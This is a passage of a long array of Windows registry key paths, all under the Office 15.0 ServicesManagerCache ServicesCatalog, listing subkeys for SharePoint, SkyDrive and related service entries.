  900.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Thumbnails\\Url32x32",
  901.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Thumbnails\\Url48x48",
  902.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT",
  903.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Capabilities",
  904.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\ConnectMechanism",
  905.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\IsManaged",
  906.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\IsRemovable",
  907.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\ServiceOwner",
  908.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\SortOrder",
  909.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\SupportsMultiple",
  910.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\CapabilitiesMetadata",
  911.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Description",
  912.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Name",
  913.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\ServiceId",
  914.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\ServiceUrl",
  915.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Metadata",
  916.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Metadata\\KeyTip",
  917.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Metadata\\Type",
  918.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Thumbnails",
  919.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Thumbnails\\Url16x16",
  920.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Thumbnails\\Url32x32",
  921.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Thumbnails\\Url48x48",
  922.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP",
  923.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Capabilities",
  924.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\ConnectMechanism",
  925.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\IsManaged",
  926.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\IsRemovable",
  927.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\ServiceOwner",
  928.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\SortOrder",
  929.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\SupportsMultiple",
  930.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\CapabilitiesMetadata",
  931.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Description",
  932.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Name",
  933.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\ServiceId",
  934.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\ServiceUrl",
  935.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Metadata",
  936.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Metadata\\KeyTip",
  937.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Metadata\\Type",
  938.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Thumbnails",
  939.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Thumbnails\\Url16x16",
  940.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Thumbnails\\Url32x32",
  941.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Thumbnails\\Url48x48",
  942.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED",
  943.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Capabilities",
  944.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\ConnectMechanism",
  945.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\IsManaged",
  946.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\IsRemovable",
  947.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\ServiceOwner",
  948.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\SortOrder",
  949.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\SupportsMultiple",
  950.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\CapabilitiesMetadata",
  951.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Description",
  952.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Name",
  953.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\ServiceId",
  954.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\ServiceUrl",
  955.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Metadata",
  956.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Metadata\\KeyTip",
  957.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Metadata\\Type",
  958.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT",
  959.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Capabilities",
  960.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\ConnectMechanism",
  961.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\IsManaged",
  962.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\IsRemovable",
  963.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\ServiceOwner",
  964.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\SortOrder",
  965.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\SupportsMultiple",
  966.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\CapabilitiesMetadata",
  967.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Description",
  968.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Name",
  969.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\ServiceId",
  970.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\ServiceUrl",
  971.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Metadata",
  972.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Metadata\\DefaultFolderRelativePath",
  973.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Metadata\\KeyTip",
  974.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Metadata\\Type",
  975.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Thumbnails",
  976.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Thumbnails\\Url16x16",
  977.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Thumbnails\\Url32x32",
  978.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Thumbnails\\Url48x48",
  979.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP",
  980.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Capabilities",
  981.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\ConnectMechanism",
  982.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\IsManaged",
  983.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\IsRemovable",
  984.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\ServiceOwner",
  985.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\SortOrder",
  986.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\SupportsMultiple",
  987.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\CapabilitiesMetadata",
  988.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Description",
  989.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Name",
  990.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\ServiceId",
  991.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\ServiceUrl",
  992.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Metadata",
  993.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Metadata\\KeyTip",
  994.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Metadata\\Type",
  995.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Thumbnails",
  996.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Thumbnails\\Url16x16",
  997.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Thumbnails\\Url32x32",
  998.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Thumbnails\\Url48x48",
  999.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER",
  1000.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Capabilities",
  1001.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\ConnectMechanism",
  1002.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\IsManaged",
  1003.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\IsRemovable",
  1004.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\ServiceOwner",
  1005.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\SortOrder",
  1006.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\SupportsMultiple",
  1007.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\CapabilitiesMetadata",
  1008.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Description",
  1009.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Name",
  1010.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\ServiceId",
  1011.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\ServiceUrl",
  1012.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Metadata",
  1013.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Metadata\\HideIfEmpty",
  1014.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Metadata\\KeyTip",
  1015.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Metadata\\Type",
  1016.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Thumbnails",
  1017.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Thumbnails\\Url16x16",
  1018.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Thumbnails\\Url32x32",
  1019.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Thumbnails\\Url48x48",
  1020.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE",
  1021.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Capabilities",
  1022.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\ConnectMechanism",
  1023.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\IsManaged",
  1024.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\IsRemovable",
  1025.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\ServiceOwner",
  1026.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\SortOrder",
  1027.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\SupportsMultiple",
  1028.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\CapabilitiesMetadata",
  1029.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Description",
  1030.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Name",
  1031.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\ServiceId",
  1032.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\ServiceUrl",
  1033.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata",
  1034.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata\\DefaultCreateRelativePath",
  1035.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata\\DefaultFolderRelativePath",
  1036.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata\\KeyTip",
  1037.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata\\RegularExpression",
  1038.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata\\Type",
  1039.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Thumbnails",
  1040.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Thumbnails\\Url16x16",
  1041.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Thumbnails\\Url32x32",
  1042.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Thumbnails\\Url48x48",
  1043.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT",
  1044.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Capabilities",
  1045.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\ConnectMechanism",
  1046.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\IsManaged",
  1047.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\IsRemovable",
  1048.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\ServiceOwner",
  1049.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\SortOrder",
  1050.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\SupportsMultiple",
  1051.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Description",
  1052.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Name",
  1053.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\ServiceId",
  1054.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\ServiceUrl",
  1055.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Thumbnails",
  1056.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Thumbnails\\Url16x16",
  1057.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Thumbnails\\Url32x32",
  1058.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Thumbnails\\Url48x48",
  1059.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE",
  1060.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Capabilities",
  1061.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\ConnectMechanism",
